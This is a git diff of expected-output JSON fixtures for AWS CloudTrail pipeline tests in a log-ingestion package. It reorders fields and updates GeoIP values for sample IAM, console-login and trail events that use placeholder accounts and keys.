- { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "cloud": { "region": "us-east-1", "account": { @@ -90,6 +83,10 @@ "Alice" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"0123456789012\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\"},\"eventTime\":\"2020-01-09T00:03:36Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"ChangePassword\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"aws-cli/1.16.310 Python/3.8.1 Darwin/18.7.0 botocore/1.13.46\",\"requestParameters\":null,\"responseElements\":null,\"requestID\":\"EXAMPLE-5c16-4eda-9724-EXAMPLE\",\"eventID\":\"EXAMPLE-35a7-4c25-9fc7-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "iam.amazonaws.com", @@ -130,7 +127,10 @@ "name": "Spider" }, "version": "1.16.310" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-console-login-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-console-login-json.log-expected.json index 69fec10edc1..5163692301d 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-console-login-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-console-login-json.log-expected.json @@ -1,17 +1,32 @@ { "expected": [ { + "cloud": { + "region": "us-east-2", + "account": { + "id": "111122223333" + } + }, + "@timestamp": "2014-07-16T15:49:27.000Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "JohnDoe" + ] + }, "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -23,24 +38,6 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, - "tags": [ - "preserve_original_event" - ], - "cloud": { - "region": "us-east-2", - "account": { - "id": "111122223333" - } - }, - "@timestamp": "2014-07-16T15:49:27.000Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "user": [ - "JohnDoe" - ] - }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"AIDACKCEVSQ6C2EXAMPLE\",\"arn\":\"arn:aws:iam::111122223333:user/JohnDoe\",\"accountId\":\"111122223333\",\"userName\":\"JohnDoe\"},\"eventTime\":\"2014-07-16T15:49:27Z\",\"eventSource\":\"signin.amazonaws.com\",\"eventName\":\"ConsoleLogin\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"89.160.20.156\",\"userAgent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0\",\"requestParameters\":null,\"responseElements\":{\"ConsoleLogin\":\"Success\"},\"additionalEventData\":{\"MobileVersion\":\"No\",\"LoginTo\":\"https://console.aws.amazon.com/s3/\",\"MFAUsed\":\"No\"},\"eventID\":\"3fcfb182-98f8-4744-bd45-10aEXAMPLE\"}", "provider": "signin.amazonaws.com", @@ -100,20 +97,38 @@ "name": "Other" }, "version": "24.0." - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "cloud": { + "region": "us-east-2", + "account": { + "id": "111122223333" + } + }, + "@timestamp": "2014-07-08T17:35:27.000Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "JaneDoe" + ] + }, "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -125,24 +140,6 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, - "tags": [ - "preserve_original_event" - ], - "cloud": { - "region": "us-east-2", - "account": { - "id": "111122223333" - } - }, - "@timestamp": "2014-07-08T17:35:27.000Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "user": [ - "JaneDoe" - ] - }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"AIDACKCEVSQ6C2EXAMPLE\",\"arn\":\"arn:aws:iam::111122223333:user/JaneDoe\",\"accountId\":\"111122223333\",\"userName\":\"JaneDoe\"},\"eventTime\":\"2014-07-08T17:35:27Z\",\"eventSource\":\"signin.amazonaws.com\",\"eventName\":\"ConsoleLogin\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"89.160.20.156\",\"userAgent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0\",\"errorMessage\":\"Failed authentication\",\"requestParameters\":null,\"responseElements\":{\"ConsoleLogin\":\"Failure\"},\"additionalEventData\":{\"MobileVersion\":\"No\",\"LoginTo\":\"https://console.aws.amazon.com/sns\",\"MFAUsed\":\"No\"},\"eventID\":\"11ea990b-4678-4bcd-8fbe-625EXAMPLE\"}", "provider": "signin.amazonaws.com", @@ -203,7 +200,10 @@ "name": "Other" }, "version": "24.0." - } + }, + "tags": [ + "preserve_original_event" + ] }, { "cloud": { @@ -219,14 +219,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-access-key-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-access-key-json.log-expected.json index fe958a8e1bd..0ffe55825e9 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-access-key-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-access-key-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-1", "account": { @@ -24,6 +17,10 @@ "Bob" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-08T15:12:16Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-08T20:43:06Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"CreateAccessKey\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"userName\":\"Bob\"},\"responseElements\":{\"accessKey\":{\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"status\":\"Active\",\"userName\":\"Bob\",\"createDate\":\"Jan 8, 2020 8:43:06 PM\"}},\"requestID\":\"EXAMPLE-823a-48dc-8fa9-EXAMPLE\",\"eventID\":\"EXAMPLE-3cab-40f8-938b-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "iam.amazonaws.com", @@ -85,7 +82,10 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log-expected.json index 00bd7e5645d..ce1c161bf24 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log-expected.json @@ -1,17 +1,32 @@ { "expected": [ { + "cloud": { + "region": "us-east-2", + "account": { + "id": "123456789012" + } + }, + "@timestamp": "2014-03-06T17:10:34.000Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "Alice" + ] + }, "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -23,24 +38,6 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, - "tags": [ - "preserve_original_event" - ], - "cloud": { - "region": "us-east-2", - "account": { - "id": "123456789012" - } - }, - "@timestamp": "2014-03-06T17:10:34.000Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "user": [ - "Alice" - ] - }, "event": { "original": "{\"eventVersion\":\"1.0\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"2014-03-06T15:15:06Z\"}}},\"eventTime\":\"2014-03-06T17:10:34Z\",\"eventSource\":\"ec2.amazonaws.com\",\"eventName\":\"CreateKeyPair\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"89.160.20.156\",\"userAgent\":\"EC2ConsoleBackend, aws-sdk-java/Linux/x.xx.fleetxen Java_HotSpot(TM)_64-Bit_Server_VM/xx\",\"requestParameters\":{\"keyName\":\"mykeypair\"},\"responseElements\":{\"keyName\":\"mykeypair\",\"keyFingerprint\":\"30:1d:46:d0:5b:ad:7e:1b:b6:70:62:8b:ff:38:b5:e9:ab:5d:b8:21\",\"keyMaterial\":\"\u003csensitiveDataRemoved\u003e\"}}", "provider": "ec2.amazonaws.com", @@ -95,7 +92,10 @@ "device": { "name": "Other" } - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-trail-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-trail-json.log-expected.json index 1839c2927b0..b86259807b5 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-trail-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-trail-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-west-2", "account": { @@ -23,6 +16,10 @@ "Alice" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"sessionIssuer\":{},\"webIdFederationData\":{},\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-08T15:12:16Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-08T15:30:25Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"CreateTrail\",\"awsRegion\":\"us-west-2\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"name\":\"TEST-trail\",\"s3BucketName\":\"TEST-cloudtrail-bucket\",\"includeGlobalServiceEvents\":true,\"isMultiRegionTrail\":true,\"enableLogFileValidation\":true,\"kmsKeyId\":\"\",\"isOrganizationTrail\":false},\"responseElements\":{\"name\":\"TEST-trail\",\"s3BucketName\":\"TEST-cloudtrail-bucket\",\"includeGlobalServiceEvents\":true,\"isMultiRegionTrail\":true,\"trailARN\":\"arn:aws:cloudtrail:us-west-2:0123456789012:trail/TEST-trail\",\"logFileValidationEnabled\":true,\"isOrganizationTrail\":false},\"requestID\":\"EXAMPLE-5149-4cf2-be99-EXAMPLE\",\"eventID\":\"EXAMPLE-d04b-4eff-833a-EXAMPLE\",\"readOnly\":false,\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "cloudtrail.amazonaws.com", @@ -82,7 +79,10 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-user-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-user-json.log-expected.json index 5fc1e895b73..413dc250e79 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-user-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-user-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-2", "account": { @@ -24,6 +17,10 @@ "Bob" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.0\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\"},\"eventTime\":\"2014-03-24T21:11:59Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"CreateUser\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"aws-cli/1.3.2 Python/2.7.5 Windows/7\",\"requestParameters\":{\"userName\":\"Bob\"},\"responseElements\":{\"user\":{\"createDate\":\"Mar 24, 2014 9:11:59 PM\",\"userName\":\"Bob\",\"arn\":\"arn:aws:iam::123456789012:user/Bob\",\"path\":\"/\",\"userId\":\"EXAMPLEUSERID\"}}}", "provider": "iam.amazonaws.com", @@ -83,7 +80,10 @@ "name": "Other" }, "version": "1.3.2" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-virtual-mfa-device-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-virtual-mfa-device-json.log-expected.json index 4a9c4f4240d..1884ebe14de 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-virtual-mfa-device-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-virtual-mfa-device-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-1", "account": { @@ -23,6 +16,10 @@ "Alice" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"2019-11-27T15:07:22Z\"}}},\"eventTime\":\"2019-11-27T15:10:15Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"CreateVirtualMFADevice\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"console.amazonaws.com\",\"requestParameters\":{\"virtualMFADeviceName\":\"Alice\",\"path\":\"/\"},\"responseElements\":{\"virtualMFADevice\":{\"serialNumber\":\"arn:aws:iam::0123456789012:mfa/Alice\"}},\"requestID\":\"EXAMPLE-303b-4b0e-a8c7-EXAMPLE\",\"eventID\":\"EXAMPLE-351c-472a-b089-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "iam.amazonaws.com", @@ -78,7 +75,10 @@ "name": "Other" }, "original": "console.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-deactivate-mfa-device-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-deactivate-mfa-device-json.log-expected.json index 764cc3d905b..b30f8843ba1 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-deactivate-mfa-device-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-deactivate-mfa-device-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-1", "account": { @@ -23,6 +16,10 @@ "Alice" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_ID\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-09T16:36:17Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-10T00:34:02Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"DeactivateMFADevice\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"userName\":\"Alice\",\"serialNumber\":\"arn:aws:iam::0123456789012:mfa/Alice\"},\"responseElements\":null,\"requestID\":\"EXAMPLE-801a-4624-8fa0-EXAMPLE\",\"eventID\":\"EXAMPLE-1889-416b-ace9-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "iam.amazonaws.com", @@ -76,7 +73,10 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-access-key-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-access-key-json.log-expected.json index 885f9b97c97..aa9e820ad8b 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-access-key-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-access-key-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-1", "account": { @@ -24,6 +17,10 @@ "Bob" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_ID\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-08T15:12:16Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-08T19:09:36Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"DeleteAccessKey\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"userName\":\"Bob\",\"accessKeyId\":\"EXAMPLE_ID\"},\"responseElements\":null,\"requestID\":\"EXAMPLE-3bea-41fa-a0b4-EXAMPLE\",\"eventID\":\"EXAMPLE-0698-46bd-998d-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "iam.amazonaws.com", @@ -77,7 +74,10 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-bucket-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-bucket-json.log-expected.json index 4ed161acea7..ce237efc69a 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-bucket-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-bucket-json.log-expected.json @@ -14,14 +14,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-ssh-public-key-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-ssh-public-key-json.log-expected.json index 6ffa98520d4..253d4c6b7bb 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-ssh-public-key-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-ssh-public-key-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-1", "account": { @@ -24,6 +17,10 @@ "Bob" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-10T14:38:30Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-10T16:07:08Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"DeleteSSHPublicKey\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"sSHPublicKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Bob\"},\"responseElements\":null,\"requestID\":\"EXAMPLE-7b34-44ae-a22f-EXAMPLE\",\"eventID\":\"EXAMPLE-72ff-4d4f-9a8d-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "iam.amazonaws.com", @@ -77,7 +74,10 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-trail-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-trail-json.log-expected.json index 2dd33e98815..ae6e0fb9e5f 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-trail-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-trail-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-west-2", "account": { @@ -23,6 +16,10 @@ "Alice" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\"},\"eventTime\":\"2020-01-09T20:09:51Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"DeleteTrail\",\"awsRegion\":\"us-west-2\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"aws-cli/1.16.310 Python/3.8.1 Darwin/18.7.0 botocore/1.13.46\",\"requestParameters\":{\"name\":\"arn:aws:cloudtrail:us-west-2:0123456789012:trail/test-trail\"},\"responseElements\":null,\"requestID\":\"EXAMPLE-d44f-4a2a-966f-EXAMPLE\",\"eventID\":\"EXAMPLE-3f9d-4634-8ff1-EXAMPLE\",\"readOnly\":false,\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "cloudtrail.amazonaws.com", @@ -63,7 +60,10 @@ "name": "Spider" }, "version": "1.16.310" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-user-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-user-json.log-expected.json index 6bb1d94f1ec..6026a18f907 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-user-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-user-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-1", "account": { @@ -24,6 +17,10 @@ "Bob" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-03T15:26:38Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-03T15:50:52Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"DeleteUser\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"userName\":\"Bob\"},\"responseElements\":null,\"requestID\":\"0e794d53-cdb5-4f7d-b7db-5EXAMPLE\",\"eventID\":\"b89eb34b-8fcb-4cba-8439-d4EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"123456789012\"}", "provider": "iam.amazonaws.com", @@ -76,7 +73,10 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-virtual-mfa-device-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-virtual-mfa-device-json.log-expected.json index a482b812221..86319a3d4bf 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-virtual-mfa-device-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-virtual-mfa-device-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-1", "account": { @@ -23,6 +16,10 @@ "Alice" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": 